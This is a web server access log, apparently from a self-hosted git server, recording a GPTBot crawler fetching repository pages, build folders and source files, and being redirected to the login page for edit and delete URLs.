[Length 37336] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" -[17/Feb/2026:16:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:38:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10475] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10474] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10474] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:38:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:38:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:38:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/app/database.py" -[17/Feb/2026:16:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16387] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:16:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" -[17/Feb/2026:16:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:16:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10046] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:16:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10045] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" -[17/Feb/2026:16:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:16:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10047] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:16:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:16:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 33986] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:16:38:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:38:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9950] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9955] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9950] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9949] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9951] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9951] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9949] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9954] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:57 +0000] - 200 200 - GET https 